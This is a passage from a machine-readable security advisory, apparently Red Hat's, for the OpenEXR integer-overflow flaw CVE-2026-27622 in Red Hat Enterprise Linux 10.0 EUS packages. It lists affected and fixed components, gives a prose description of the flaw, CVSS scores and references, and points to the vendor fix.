"name": "openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder EUS (v. 10.0)",
"product_id": "CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"relates_to_product_reference": "CRB-10.0.Z.E2S"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64"
],
"known_not_affected": [
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-13T02:25:56+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:7678"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src",
"AppStream-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"AppStream-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.src",
"CRB-10.0.Z.E2S:openexr-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-debuginfo-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-debugsource-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-devel-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-libs-0:3.1.10-8.el10_0.1.x86_64",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.aarch64",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.ppc64le",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.s390x",
"CRB-10.0.Z.E2S:openexr-libs-debuginfo-0:3.1.10-8.el10_0.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:16030
